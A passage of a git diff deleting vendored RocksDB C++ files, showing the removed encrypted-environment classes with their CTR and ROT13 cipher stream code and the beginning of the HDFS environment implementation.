-    }
-    status = stream_->Decrypt(offset, (char*)result->data(), result->size());
-    return status;
-  }
-
-  // Readahead the file starting from offset by n bytes for caching.
-  virtual Status Prefetch(uint64_t offset, size_t n) override {
-    //return Status::OK();
-    return file_->Prefetch(offset + prefixLength_, n);
-  }
-
-  // Tries to get an unique ID for this file that will be the same each time
-  // the file is opened (and will stay the same while the file is open).
-  // Furthermore, it tries to make this ID at most "max_size" bytes. If such an
-  // ID can be created this function returns the length of the ID and places it
-  // in "id"; otherwise, this function returns 0, in which case "id"
-  // may not have been modified.
-  //
-  // This function guarantees, for IDs from a given environment, two unique ids
-  // cannot be made equal to eachother by adding arbitrary bytes to one of
-  // them. That is, no unique ID is the prefix of another.
-  //
-  // This function guarantees that the returned ID will not be interpretable as
-  // a single varint.
-  //
-  // Note: these IDs are only valid for the duration of the process.
-  virtual size_t GetUniqueId(char* id, size_t max_size) const override {
-    return file_->GetUniqueId(id, max_size);
-  };
-
-  virtual void Hint(AccessPattern pattern) override {
-    file_->Hint(pattern);
-  }
-
-  // Indicates the upper layers if the current RandomAccessFile implementation
-  // uses direct IO.
-  virtual bool use_direct_io() const override {
-     return file_->use_direct_io(); 
-  }
-
-  // Use the returned alignment value to allocate
-  // aligned buffer for Direct I/O
-  virtual size_t GetRequiredBufferAlignment() const override { 
-    return file_->GetRequiredBufferAlignment(); 
-  }
-
-  // Remove any kind of caching of data from the offset to offset+length
-  // of this file. If the length is 0, then it refers to the end of file.
-  // If the system is not caching the file contents, then this is a noop.
-  virtual Status InvalidateCache(size_t offset, size_t length) override {
-    return file_->InvalidateCache(offset + prefixLength_, length);
-  }
-};
-
-// A file abstraction for sequential writing.  The implementation
-// must provide buffering since callers may append small fragments
-// at a time to the file.
-class EncryptedWritableFile : public WritableFileWrapper {
-  private:
-    std::unique_ptr<WritableFile> file_;
-    std::unique_ptr<BlockAccessCipherStream> stream_;
-    size_t prefixLength_;
-
- public:
-  // Default ctor. Prefix is assumed to be written already.
-  EncryptedWritableFile(WritableFile* f, BlockAccessCipherStream* s, size_t prefixLength)
-    : WritableFileWrapper(f), file_(f), stream_(s), prefixLength_(prefixLength) { }
-
-  Status Append(const Slice& data) override { 
-    AlignedBuffer buf;
-    Status status;
-    Slice dataToAppend(data); 
-    if (data.size() > 0) {
-      auto offset = file_->GetFileSize(); // size including prefix
-      // Encrypt in cloned buffer
-      buf.Alignment(GetRequiredBufferAlignment());
-      buf.AllocateNewBuffer(data.size());
-      memmove(buf.BufferStart(), data.data(), data.size());
-      status = stream_->Encrypt(offset, buf.BufferStart(), data.size());
-      if (!status.ok()) {
-        return status;
-      }
-      dataToAppend = Slice(buf.BufferStart(), data.size());
-    }
-    status = file_->Append(dataToAppend); 
-    if (!status.ok()) {
-      return status;
-    }
-    return status;
-  }
-
-  Status PositionedAppend(const Slice& data, uint64_t offset) override {
-    AlignedBuffer buf;
-    Status status;
-    Slice dataToAppend(data); 
-    offset += prefixLength_;
-    if (data.size() > 0) {
-      // Encrypt in cloned buffer
-      buf.Alignment(GetRequiredBufferAlignment());
-      buf.AllocateNewBuffer(data.size());
-      memmove(buf.BufferStart(), data.data(), data.size());
-      status = stream_->Encrypt(offset, buf.BufferStart(), data.size());
-      if (!status.ok()) {
-        return status;
-      }
-      dataToAppend = Slice(buf.BufferStart(), data.size());
-    }
-    status = file_->PositionedAppend(dataToAppend, offset);
-    if (!status.ok()) {
-      return status;
-    }
-    return status;
-  }
-
-  // Indicates the upper layers if the current WritableFile implementation
-  // uses direct IO.
-  virtual bool use_direct_io() const override { return file_->use_direct_io(); }
-
-  // Use the returned alignment value to allocate
-  // aligned buffer for Direct I/O
-  virtual size_t GetRequiredBufferAlignment() const override { return file_->GetRequiredBufferAlignment(); } 
-
-    /*
-   * Get the size of valid data in the file.
-   */
-  virtual uint64_t GetFileSize() override {
-    return file_->GetFileSize() - prefixLength_;
-  }
-
-  // Truncate is necessary to trim the file to the correct size
-  // before closing. It is not always possible to keep track of the file
-  // size due to whole pages writes. The behavior is undefined if called
-  // with other writes to follow.
-  virtual Status Truncate(uint64_t size) override {
-    return file_->Truncate(size + prefixLength_);
-  }
-
-    // Remove any kind of caching of data from the offset to offset+length
-  // of this file. If the length is 0, then it refers to the end of file.
-  // If the system is not caching the file contents, then this is a noop.
-  // This call has no effect on dirty pages in the cache.
-  virtual Status InvalidateCache(size_t offset, size_t length) override {
-    return file_->InvalidateCache(offset + prefixLength_, length);
-  }
-
-  // Sync a file range with disk.
-  // offset is the starting byte of the file range to be synchronized.
-  // nbytes specifies the length of the range to be synchronized.
-  // This asks the OS to initiate flushing the cached data to disk,
-  // without waiting for completion.
-  // Default implementation does nothing.
-  virtual Status RangeSync(uint64_t offset, uint64_t nbytes) override { 
-    return file_->RangeSync(offset + prefixLength_, nbytes);
-  }
-
-  // PrepareWrite performs any necessary preparation for a write
-  // before the write actually occurs.  This allows for pre-allocation
-  // of space on devices where it can result in less file
-  // fragmentation and/or less waste from over-zealous filesystem
-  // pre-allocation.
-  virtual void PrepareWrite(size_t offset, size_t len) override {
-    file_->PrepareWrite(offset + prefixLength_, len);
-  }
-
-  // Pre-allocates space for a file.
-  virtual Status Allocate(uint64_t offset, uint64_t len) override {
-    return file_->Allocate(offset + prefixLength_, len);
-  }
-};
-
-// A file abstraction for random reading and writing.
-class EncryptedRandomRWFile : public RandomRWFile {
-  private:
-    std::unique_ptr<RandomRWFile> file_;
-    std::unique_ptr<BlockAccessCipherStream> stream_;
-    size_t prefixLength_;
-
- public:
-  EncryptedRandomRWFile(RandomRWFile* f, BlockAccessCipherStream* s, size_t prefixLength)
-    : file_(f), stream_(s), prefixLength_(prefixLength) {}
-
-  // Indicates if the class makes use of direct I/O
-  // If false you must pass aligned buffer to Write()
-  virtual bool use_direct_io() const override { return file_->use_direct_io(); }
-
-  // Use the returned alignment value to allocate
-  // aligned buffer for Direct I/O
-  virtual size_t GetRequiredBufferAlignment() const override { 
-    return file_->GetRequiredBufferAlignment(); 
-  }
-
-  // Write bytes in `data` at  offset `offset`, Returns Status::OK() on success.
-  // Pass aligned buffer when use_direct_io() returns true.
-  virtual Status Write(uint64_t offset, const Slice& data) override {
-    AlignedBuffer buf;
-    Status status;
-    Slice dataToWrite(data); 
-    offset += prefixLength_;
-    if (data.size() > 0) {
-      // Encrypt in cloned buffer
-      buf.Alignment(GetRequiredBufferAlignment());
-      buf.AllocateNewBuffer(data.size());
-      memmove(buf.BufferStart(), data.data(), data.size());
-      status = stream_->Encrypt(offset, buf.BufferStart(), data.size());
-      if (!status.ok()) {
-        return status;
-      }
-      dataToWrite = Slice(buf.BufferStart(), data.size());
-    }
-    status = file_->Write(offset, dataToWrite);
-    return status;
-  }
-
-  // Read up to `n` bytes starting from offset `offset` and store them in
-  // result, provided `scratch` size should be at least `n`.
-  // Returns Status::OK() on success.
-  virtual Status Read(uint64_t offset, size_t n, Slice* result, char* scratch) const override { 
-    assert(scratch);
-    offset += prefixLength_;
-    auto status = file_->Read(offset, n, result, scratch);
-    if (!status.ok()) {
-      return status;
-    }
-    status = stream_->Decrypt(offset, (char*)result->data(), result->size());
-    return status;
-  }
-
-  virtual Status Flush() override {
-    return file_->Flush();
-  }
-
-  virtual Status Sync() override {
-    return file_->Sync();
-  }
-
-  virtual Status Fsync() override { 
-    return file_->Fsync();
-  }
-
-  virtual Status Close() override {
-    return file_->Close();
-  }
-};
-
-// EncryptedEnv implements an Env wrapper that adds encryption to files stored on disk.
-class EncryptedEnv : public EnvWrapper {
- public:
-  EncryptedEnv(Env* base_env, EncryptionProvider *provider)
-      : EnvWrapper(base_env) {
-    provider_ = provider;
-  }
-
-  // NewSequentialFile opens a file for sequential reading.
-  virtual Status NewSequentialFile(const std::string& fname,
-                                   std::unique_ptr<SequentialFile>* result,
-                                   const EnvOptions& options) override {
-    result->reset();
-    if (options.use_mmap_reads) {
-      return Status::InvalidArgument();
-    }
-    // Open file using underlying Env implementation
-    std::unique_ptr<SequentialFile> underlying;
-    auto status = EnvWrapper::NewSequentialFile(fname, &underlying, options);
-    if (!status.ok()) {
-      return status;
-    }
-    // Read prefix (if needed)
-    AlignedBuffer prefixBuf;
-    Slice prefixSlice;
-    size_t prefixLength = provider_->GetPrefixLength();
-    if (prefixLength > 0) {
-      // Read prefix 
-      prefixBuf.Alignment(underlying->GetRequiredBufferAlignment());
-      prefixBuf.AllocateNewBuffer(prefixLength);
-      status = underlying->Read(prefixLength, &prefixSlice, prefixBuf.BufferStart());
-      if (!status.ok()) {
-        return status;
-      }
-    }
-    // Create cipher stream
-    std::unique_ptr<BlockAccessCipherStream> stream;
-    status = provider_->CreateCipherStream(fname, options, prefixSlice, &stream);
-    if (!status.ok()) {
-      return status;
-    }
-    (*result) = std::unique_ptr<SequentialFile>(new EncryptedSequentialFile(underlying.release(), stream.release(), prefixLength));
-    return Status::OK();
-  }
-
-  // NewRandomAccessFile opens a file for random read access.
-  virtual Status NewRandomAccessFile(const std::string& fname,
-                                     unique_ptr<RandomAccessFile>* result,
-                                     const EnvOptions& options) override {
-    result->reset();
-    if (options.use_mmap_reads) {
-      return Status::InvalidArgument();
-    }
-    // Open file using underlying Env implementation
-    std::unique_ptr<RandomAccessFile> underlying;
-    auto status = EnvWrapper::NewRandomAccessFile(fname, &underlying, options);
-    if (!status.ok()) {
-      return status;
-    }
-    // Read prefix (if needed)
-    AlignedBuffer prefixBuf;
-    Slice prefixSlice;
-    size_t prefixLength = provider_->GetPrefixLength();
-    if (prefixLength > 0) {
-      // Read prefix 
-      prefixBuf.Alignment(underlying->GetRequiredBufferAlignment());
-      prefixBuf.AllocateNewBuffer(prefixLength);
-      status = underlying->Read(0, prefixLength, &prefixSlice, prefixBuf.BufferStart());
-      if (!status.ok()) {
-        return status;
-      }
-    }
-    // Create cipher stream
-    std::unique_ptr<BlockAccessCipherStream> stream;
-    status = provider_->CreateCipherStream(fname, options, prefixSlice, &stream);
-    if (!status.ok()) {
-      return status;
-    }
-    (*result) = std::unique_ptr<RandomAccessFile>(new EncryptedRandomAccessFile(underlying.release(), stream.release(), prefixLength));
-    return Status::OK();
-  }
-  
-  // NewWritableFile opens a file for sequential writing.
-  virtual Status NewWritableFile(const std::string& fname,
-                                 unique_ptr<WritableFile>* result,
-                                 const EnvOptions& options) override {
-    result->reset();
-    if (options.use_mmap_writes) {
-      return Status::InvalidArgument();
-    }
-    // Open file using underlying Env implementation
-    std::unique_ptr<WritableFile> underlying;
-    Status status = EnvWrapper::NewWritableFile(fname, &underlying, options);
-    if (!status.ok()) {
-      return status;
-    }
-    // Initialize & write prefix (if needed)
-    AlignedBuffer prefixBuf;
-    Slice prefixSlice;
-    size_t prefixLength = provider_->GetPrefixLength();
-    if (prefixLength > 0) {
-      // Initialize prefix 
-      prefixBuf.Alignment(underlying->GetRequiredBufferAlignment());
-      prefixBuf.AllocateNewBuffer(prefixLength);
-      provider_->CreateNewPrefix(fname, prefixBuf.BufferStart(), prefixLength);
-      prefixSlice = Slice(prefixBuf.BufferStart(), prefixLength);
-      // Write prefix 
-      status = underlying->Append(prefixSlice);
-      if (!status.ok()) {
-        return status;
-      }
-    }
-    // Create cipher stream
-    std::unique_ptr<BlockAccessCipherStream> stream;
-    status = provider_->CreateCipherStream(fname, options, prefixSlice, &stream);
-    if (!status.ok()) {
-      return status;
-    }
-    (*result) = std::unique_ptr<WritableFile>(new EncryptedWritableFile(underlying.release(), stream.release(), prefixLength));
-    return Status::OK();
-  }
-
-  // Create an object that writes to a new file with the specified
-  // name.  Deletes any existing file with the same name and creates a
-  // new file.  On success, stores a pointer to the new file in
-  // *result and returns OK.  On failure stores nullptr in *result and
-  // returns non-OK.
-  //
-  // The returned file will only be accessed by one thread at a time.
-  virtual Status ReopenWritableFile(const std::string& fname,
-                                   unique_ptr<WritableFile>* result,
-                                   const EnvOptions& options) override {
-    result->reset();
-    if (options.use_mmap_writes) {
-      return Status::InvalidArgument();
-    }
-    // Open file using underlying Env implementation
-    std::unique_ptr<WritableFile> underlying;
-    Status status = EnvWrapper::ReopenWritableFile(fname, &underlying, options);
-    if (!status.ok()) {
-      return status;
-    }
-    // Initialize & write prefix (if needed)
-    AlignedBuffer prefixBuf;
-    Slice prefixSlice;
-    size_t prefixLength = provider_->GetPrefixLength();
-    if (prefixLength > 0) {
-      // Initialize prefix 
-      prefixBuf.Alignment(underlying->GetRequiredBufferAlignment());
-      prefixBuf.AllocateNewBuffer(prefixLength);
-      provider_->CreateNewPrefix(fname, prefixBuf.BufferStart(), prefixLength);
-      prefixSlice = Slice(prefixBuf.BufferStart(), prefixLength);
-      // Write prefix 
-      status = underlying->Append(prefixSlice);
-      if (!status.ok()) {
-        return status;
-      }
-    }
-    // Create cipher stream
-    std::unique_ptr<BlockAccessCipherStream> stream;
-    status = provider_->CreateCipherStream(fname, options, prefixSlice, &stream);
-    if (!status.ok()) {
-      return status;
-    }
-    (*result) = std::unique_ptr<WritableFile>(new EncryptedWritableFile(underlying.release(), stream.release(), prefixLength));
-    return Status::OK();
-  }
-
-  // Reuse an existing file by renaming it and opening it as writable.
-  virtual Status ReuseWritableFile(const std::string& fname,
-                                   const std::string& old_fname,
-                                   unique_ptr<WritableFile>* result,
-                                   const EnvOptions& options) override {
-    result->reset();
-    if (options.use_mmap_writes) {
-      return Status::InvalidArgument();
-    }
-    // Open file using underlying Env implementation
-    std::unique_ptr<WritableFile> underlying;
-    Status status = EnvWrapper::ReuseWritableFile(fname, old_fname, &underlying, options);
-    if (!status.ok()) {
-      return status;
-    }
-    // Initialize & write prefix (if needed)
-    AlignedBuffer prefixBuf;
-    Slice prefixSlice;
-    size_t prefixLength = provider_->GetPrefixLength();
-    if (prefixLength > 0) {
-      // Initialize prefix 
-      prefixBuf.Alignment(underlying->GetRequiredBufferAlignment());
-      prefixBuf.AllocateNewBuffer(prefixLength);
-      provider_->CreateNewPrefix(fname, prefixBuf.BufferStart(), prefixLength);
-      prefixSlice = Slice(prefixBuf.BufferStart(), prefixLength);
-      // Write prefix 
-      status = underlying->Append(prefixSlice);
-      if (!status.ok()) {
-        return status;
-      }
-    }
-    // Create cipher stream
-    std::unique_ptr<BlockAccessCipherStream> stream;
-    status = provider_->CreateCipherStream(fname, options, prefixSlice, &stream);
-    if (!status.ok()) {
-      return status;
-    }
-    (*result) = std::unique_ptr<WritableFile>(new EncryptedWritableFile(underlying.release(), stream.release(), prefixLength));
-    return Status::OK();
-  }
-
-  // Open `fname` for random read and write, if file dont exist the file
-  // will be created.  On success, stores a pointer to the new file in
-  // *result and returns OK.  On failure returns non-OK.
-  //
-  // The returned file will only be accessed by one thread at a time.
-  virtual Status NewRandomRWFile(const std::string& fname,
-                                 unique_ptr<RandomRWFile>* result,
-                                 const EnvOptions& options) override {
-    result->reset();
-    if (options.use_mmap_reads || options.use_mmap_writes) {
-      return Status::InvalidArgument();
-    }
-    // Check file exists
-    bool isNewFile = !FileExists(fname).ok();
-
-    // Open file using underlying Env implementation
-    std::unique_ptr<RandomRWFile> underlying;
-    Status status = EnvWrapper::NewRandomRWFile(fname, &underlying, options);
-    if (!status.ok()) {
-      return status;
-    }
-    // Read or Initialize & write prefix (if needed)
-    AlignedBuffer prefixBuf;
-    Slice prefixSlice;
-    size_t prefixLength = provider_->GetPrefixLength();
-    if (prefixLength > 0) {
-      prefixBuf.Alignment(underlying->GetRequiredBufferAlignment());
-      prefixBuf.AllocateNewBuffer(prefixLength);
-      if (!isNewFile) {
-        // File already exists, read prefix
-        status = underlying->Read(0, prefixLength, &prefixSlice, prefixBuf.BufferStart());
-        if (!status.ok()) {
-          return status;
-        }
-      } else {
-        // File is new, initialize & write prefix 
-        provider_->CreateNewPrefix(fname, prefixBuf.BufferStart(), prefixLength);
-        prefixSlice = Slice(prefixBuf.BufferStart(), prefixLength);
-        // Write prefix 
-        status = underlying->Write(0, prefixSlice);
-        if (!status.ok()) {
-          return status;
-        }
-      }
-    }
-    // Create cipher stream
-    std::unique_ptr<BlockAccessCipherStream> stream;
-    status = provider_->CreateCipherStream(fname, options, prefixSlice, &stream);
-    if (!status.ok()) {
-      return status;
-    }
-    (*result) = std::unique_ptr<RandomRWFile>(new EncryptedRandomRWFile(underlying.release(), stream.release(), prefixLength));
-    return Status::OK();
-  }
-
-    // Store in *result the attributes of the children of the specified directory.
-  // In case the implementation lists the directory prior to iterating the files
-  // and files are concurrently deleted, the deleted files will be omitted from
-  // result.
-  // The name attributes are relative to "dir".
-  // Original contents of *results are dropped.
-  // Returns OK if "dir" exists and "*result" contains its children.
-  //         NotFound if "dir" does not exist, the calling process does not have
-  //                  permission to access "dir", or if "dir" is invalid.
-  //         IOError if an IO Error was encountered
-  virtual Status GetChildrenFileAttributes(const std::string& dir, std::vector<FileAttributes>* result) override {
-    auto status = EnvWrapper::GetChildrenFileAttributes(dir, result);
-    if (!status.ok()) {
-      return status;
-    }
-    size_t prefixLength = provider_->GetPrefixLength();
-    for (auto it = std::begin(*result); it!=std::end(*result); ++it) {
-      assert(it->size_bytes >= prefixLength);
-      it->size_bytes -= prefixLength;
-    }
-    return Status::OK();
- }
-
-  // Store the size of fname in *file_size.
-  virtual Status GetFileSize(const std::string& fname, uint64_t* file_size) override {
-    auto status = EnvWrapper::GetFileSize(fname, file_size);
-    if (!status.ok()) {
-      return status;
-    }
-    size_t prefixLength = provider_->GetPrefixLength();
-    assert(*file_size >= prefixLength);
-    *file_size -= prefixLength;
-    return Status::OK();    
-  }
-
- private:
-  EncryptionProvider *provider_;
-};
-
-
-// Returns an Env that encrypts data when stored on disk and decrypts data when 
-// read from disk.
-Env* NewEncryptedEnv(Env* base_env, EncryptionProvider* provider) {
-  return new EncryptedEnv(base_env, provider);
-}
-
-// Encrypt one or more (partial) blocks of data at the file offset.
-// Length of data is given in dataSize.
-Status BlockAccessCipherStream::Encrypt(uint64_t fileOffset, char *data, size_t dataSize) {
-  // Calculate block index
-  auto blockSize = BlockSize();
-  uint64_t blockIndex = fileOffset / blockSize;
-  size_t blockOffset = fileOffset % blockSize;
-  unique_ptr<char[]> blockBuffer;
-
-  std::string scratch;
-  AllocateScratch(scratch);
-
-  // Encrypt individual blocks.
-  while (1) {
-    char *block = data;
-    size_t n = std::min(dataSize, blockSize - blockOffset);
-    if (n != blockSize) {
-      // We're not encrypting a full block. 
-      // Copy data to blockBuffer
-      if (!blockBuffer.get()) {
-        // Allocate buffer 
-        blockBuffer = unique_ptr<char[]>(new char[blockSize]);
-      }
-      block = blockBuffer.get();
-      // Copy plain data to block buffer 
-      memmove(block + blockOffset, data, n);
-    }
-    auto status = EncryptBlock(blockIndex, block, (char*)scratch.data());
-    if (!status.ok()) {
-      return status;
-    }
-    if (block != data) {
-      // Copy encrypted data back to `data`.
-      memmove(data, block + blockOffset, n);
-    }
-    dataSize -= n;
-    if (dataSize == 0) {
-      return Status::OK();
-    }
-    data += n;
-    blockOffset = 0;
-    blockIndex++;
-  }
-}
-
-// Decrypt one or more (partial) blocks of data at the file offset.
-// Length of data is given in dataSize.
-Status BlockAccessCipherStream::Decrypt(uint64_t fileOffset, char *data, size_t dataSize) {
-  // Calculate block index
-  auto blockSize = BlockSize();
-  uint64_t blockIndex = fileOffset / blockSize;
-  size_t blockOffset = fileOffset % blockSize;
-  unique_ptr<char[]> blockBuffer;
-
-  std::string scratch;
-  AllocateScratch(scratch);
-
-  // Decrypt individual blocks.
-  while (1) {
-    char *block = data;
-    size_t n = std::min(dataSize, blockSize - blockOffset);
-    if (n != blockSize) {
-      // We're not decrypting a full block. 
-      // Copy data to blockBuffer
-      if (!blockBuffer.get()) {
-        // Allocate buffer 
-        blockBuffer = unique_ptr<char[]>(new char[blockSize]);
-      }
-      block = blockBuffer.get();
-      // Copy encrypted data to block buffer 
-      memmove(block + blockOffset, data, n);
-    }
-    auto status = DecryptBlock(blockIndex, block, (char*)scratch.data());
-    if (!status.ok()) {
-      return status;
-    }
-    if (block != data) {
-      // Copy decrypted data back to `data`.
-      memmove(data, block + blockOffset, n);
-    }
-    dataSize -= n;
-    if (dataSize == 0) {
-      return Status::OK();
-    }
-    data += n;
-    blockOffset = 0;
-    blockIndex++;
-  }
-}
-
-// Encrypt a block of data.
-// Length of data is equal to BlockSize().
-Status ROT13BlockCipher::Encrypt(char *data) {
-  for (size_t i = 0; i < blockSize_; ++i) {
-      data[i] += 13;
-  }
-  return Status::OK();
-}
-
-// Decrypt a block of data.
-// Length of data is equal to BlockSize().
-Status ROT13BlockCipher::Decrypt(char *data) {
-  return Encrypt(data);
-}
-
-// Allocate scratch space which is passed to EncryptBlock/DecryptBlock.
-void CTRCipherStream::AllocateScratch(std::string& scratch) {
-  auto blockSize = cipher_.BlockSize();
-  scratch.reserve(blockSize);
-}
-
-// Encrypt a block of data at the given block index.
-// Length of data is equal to BlockSize();
-Status CTRCipherStream::EncryptBlock(uint64_t blockIndex, char *data, char* scratch) {
-
-  // Create nonce + counter
-  auto blockSize = cipher_.BlockSize();
-  memmove(scratch, iv_.data(), blockSize);
-  EncodeFixed64(scratch, blockIndex + initialCounter_);
-
-  // Encrypt nonce+counter 
-  auto status = cipher_.Encrypt(scratch);
-  if (!status.ok()) {
-    return status;
-  }
-
-  // XOR data with ciphertext.
-  for (size_t i = 0; i < blockSize; i++) {
-    data[i] = data[i] ^ scratch[i];
-  }
-  return Status::OK();
-}
-
-// Decrypt a block of data at the given block index.
-// Length of data is equal to BlockSize();
-Status CTRCipherStream::DecryptBlock(uint64_t blockIndex, char *data, char* scratch) {
-  // For CTR decryption & encryption are the same 
-  return EncryptBlock(blockIndex, data, scratch);
-}
-
-// GetPrefixLength returns the length of the prefix that is added to every file
-// and used for storing encryption options.
-// For optimal performance, the prefix length should be a multiple of 
-// the a page size.
-size_t CTREncryptionProvider::GetPrefixLength() {
-  return defaultPrefixLength;
-}
-
-// decodeCTRParameters decodes the initial counter & IV from the given
-// (plain text) prefix.
-static void decodeCTRParameters(const char *prefix, size_t blockSize, uint64_t &initialCounter, Slice &iv) {
-  // First block contains 64-bit initial counter
-  initialCounter = DecodeFixed64(prefix);
-  // Second block contains IV
-  iv = Slice(prefix + blockSize, blockSize);
-}
-
-// CreateNewPrefix initialized an allocated block of prefix memory 
-// for a new file.
-Status CTREncryptionProvider::CreateNewPrefix(const std::string& fname, char *prefix, size_t prefixLength) {
-  // Create & seed rnd.
-  Random rnd((uint32_t)Env::Default()->NowMicros());
-  // Fill entire prefix block with random values.
-  for (size_t i = 0; i < prefixLength; i++) {
-    prefix[i] = rnd.Uniform(256) & 0xFF;
-  }
-  // Take random data to extract initial counter & IV
-  auto blockSize = cipher_.BlockSize();
-  uint64_t initialCounter;
-  Slice prefixIV;
-  decodeCTRParameters(prefix, blockSize, initialCounter, prefixIV);
-
-  // Now populate the rest of the prefix, starting from the third block.
-  PopulateSecretPrefixPart(prefix + (2 * blockSize), prefixLength - (2 * blockSize), blockSize);
-
-  // Encrypt the prefix, starting from block 2 (leave block 0, 1 with initial counter & IV unencrypted)
-  CTRCipherStream cipherStream(cipher_, prefixIV.data(), initialCounter);
-  auto status = cipherStream.Encrypt(0, prefix + (2 * blockSize), prefixLength - (2 * blockSize));
-  if (!status.ok()) {
-    return status;
-  }
-  return Status::OK();
-}
-
-// PopulateSecretPrefixPart initializes the data into a new prefix block 
-// in plain text.
-// Returns the amount of space (starting from the start of the prefix)
-// that has been initialized.
-size_t CTREncryptionProvider::PopulateSecretPrefixPart(char *prefix, size_t prefixLength, size_t blockSize) {
-  // Nothing to do here, put in custom data in override when needed.
-  return 0;
-}
-
-Status CTREncryptionProvider::CreateCipherStream(const std::string& fname, const EnvOptions& options, Slice &prefix, unique_ptr<BlockAccessCipherStream>* result) {
-  // Read plain text part of prefix.
-  auto blockSize = cipher_.BlockSize();
-  uint64_t initialCounter;
-  Slice iv;
-  decodeCTRParameters(prefix.data(), blockSize, initialCounter, iv);
-
-  // Decrypt the encrypted part of the prefix, starting from block 2 (block 0, 1 with initial counter & IV are unencrypted)
-  CTRCipherStream cipherStream(cipher_, iv.data(), initialCounter);
-  auto status = cipherStream.Decrypt(0, (char*)prefix.data() + (2 * blockSize), prefix.size() - (2 * blockSize));
-  if (!status.ok()) {
-    return status;
-  }
-
-  // Create cipher stream 
-  return CreateCipherStreamFromPrefix(fname, options, initialCounter, iv, prefix, result);
-}
-
-// CreateCipherStreamFromPrefix creates a block access cipher stream for a file given
-// given name and options. The given prefix is already decrypted.
-Status CTREncryptionProvider::CreateCipherStreamFromPrefix(const std::string& fname, const EnvOptions& options,
-    uint64_t initialCounter, const Slice& iv, const Slice& prefix, unique_ptr<BlockAccessCipherStream>* result) {
-  (*result) = unique_ptr<BlockAccessCipherStream>(new CTRCipherStream(cipher_, iv.data(), initialCounter));
-  return Status::OK();
-}
-
-#endif // ROCKSDB_LITE
-
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/env/env_hdfs.cc b/thirdparty/rocksdb/env/env_hdfs.cc
deleted file mode 100644
index d98020c..0000000
--- a/thirdparty/rocksdb/env/env_hdfs.cc
+++ /dev/null
@@ -1,612 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-
-#include "rocksdb/env.h"
-#include "hdfs/env_hdfs.h"
-
-#ifdef USE_HDFS
-#ifndef ROCKSDB_HDFS_FILE_C
-#define ROCKSDB_HDFS_FILE_C
-
-#include <algorithm>
-#include <stdio.h>
-#include <sys/time.h>
-#include <time.h>
-#include <iostream>
-#include <sstream>
-#include "rocksdb/status.h"
-#include "util/string_util.h"
-
-#define HDFS_EXISTS 0
-#define HDFS_DOESNT_EXIST -1
-#define HDFS_SUCCESS 0
-
-//
-// This file defines an HDFS environment for rocksdb. It uses the libhdfs
-// api to access HDFS. All HDFS files created by one instance of rocksdb
-// will reside on the same HDFS cluster.
-//
-
-namespace rocksdb {
-
-namespace {
-
-// Log error message
-static Status IOError(const std::string& context, int err_number) {
-  return (err_number == ENOSPC) ?
-      Status::NoSpace(context, strerror(err_number)) :
-      Status::IOError(context, strerror(err_number));
-}
-
-// assume that there is one global logger for now. It is not thread-safe,
-// but need not be because the logger is initialized at db-open time.
-static Logger* mylog = nullptr;
-
-// Used for reading a file from HDFS. It implements both sequential-read
-// access methods as well as random read access methods.
-class HdfsReadableFile : virtual public SequentialFile,
-                         virtual public RandomAccessFile {
- private:
-  hdfsFS fileSys_;
-  std::string filename_;
-  hdfsFile hfile_;
-
- public:
-  HdfsReadableFile(hdfsFS fileSys, const std::string& fname)
-      : fileSys_(fileSys), filename_(fname), hfile_(nullptr) {
-    ROCKS_LOG_DEBUG(mylog, "[hdfs] HdfsReadableFile opening file %s\n",
-                    filename_.c_str());
-    hfile_ = hdfsOpenFile(fileSys_, filename_.c_str(), O_RDONLY, 0, 0, 0);
-    ROCKS_LOG_DEBUG(mylog,
-                    "[hdfs] HdfsReadableFile opened file %s hfile_=0x%p\n",
-                    filename_.c_str(), hfile_);
-  }
-
-  virtual ~HdfsReadableFile() {
-    ROCKS_LOG_DEBUG(mylog, "[hdfs] HdfsReadableFile closing file %s\n",
-                    filename_.c_str());
-    hdfsCloseFile(fileSys_, hfile_);
-    ROCKS_LOG_DEBUG(mylog, "[hdfs] HdfsReadableFile closed file %s\n",
-                    filename_.c_str());
-    hfile_ = nullptr;
-  }
-
-  bool isValid() {
-    return hfile_ != nullptr;
-  }
-
-  // sequential access, read data at current offset in file
-  virtual Status Read(size_t n, Slice* result, char* scratch) {
-    Status s;
-    ROCKS_LOG_DEBUG(mylog, "[hdfs] HdfsReadableFile reading %s %ld\n",
-                    filename_.c_str(), n);
-
-    char* buffer = scratch;
-    size_t total_bytes_read = 0;
-    tSize bytes_read = 0;
-    tSize remaining_bytes = (tSize)n;
-
-    // Read a total of n bytes repeatedly until we hit error or eof
-    while (remaining_bytes > 0) {
-      bytes_read = hdfsRead(fileSys_, hfile_, buffer, remaining_bytes);
-      if (bytes_read <= 0) {
-        break;
-      }
-      assert(bytes_read <= remaining_bytes);
-
-      total_bytes_read += bytes_read;
-      remaining_bytes -= bytes_read;
-      buffer += bytes_read;
-    }
-    assert(total_bytes_read <= n);
-
-    ROCKS_LOG_DEBUG(mylog, "[hdfs] HdfsReadableFile read %s\n",
-                    filename_.c_str());
-
-    if (bytes_read < 0) {
-      s = IOError(filename_, errno);
-    } else {
-      *result = Slice(scratch, total_bytes_read);
-    }
-
-    return s;
-  }
-
-  // random access, read data from specified offset in file
-  virtual Status Read(uint64_t offset, size_t n, Slice* result,
-                      char* scratch) const {
-    Status s;
-    ROCKS_LOG_DEBUG(mylog, "[hdfs] HdfsReadableFile preading %s\n",
-                    filename_.c_str());
-    ssize_t bytes_read = hdfsPread(fileSys_, hfile_, offset,
-                                   (void*)scratch, (tSize)n);
-    ROCKS_LOG_DEBUG(mylog, "[hdfs] HdfsReadableFile pread %s\n",
-                    filename_.c_str());
-    *result = Slice(scratch, (bytes_read < 0) ? 0 : bytes_read);
-    if (bytes_read < 0) {
-      // An error: return a non-ok status
-      s = IOError(filename_, errno);
-    }
-    return s;
-  }
-
-  virtual Status Skip(uint64_t n) {
-    ROCKS_LOG_DEBUG(mylog, "[hdfs] HdfsReadableFile skip %s\n",
-                    filename_.c_str());
-    // get current offset from file
-    tOffset current = hdfsTell(fileSys_, hfile_);
-    if (current < 0) {
-      return IOError(filename_, errno);
-    }
-    // seek to new offset in file
-    tOffset newoffset = current + n;
-    int val = hdfsSeek(fileSys_, hfile_, newoffset);
-    if (val < 0) {
-      return IOError(filename_, errno);
-    }
-    return Status::OK();
-  }
-
- private:
-
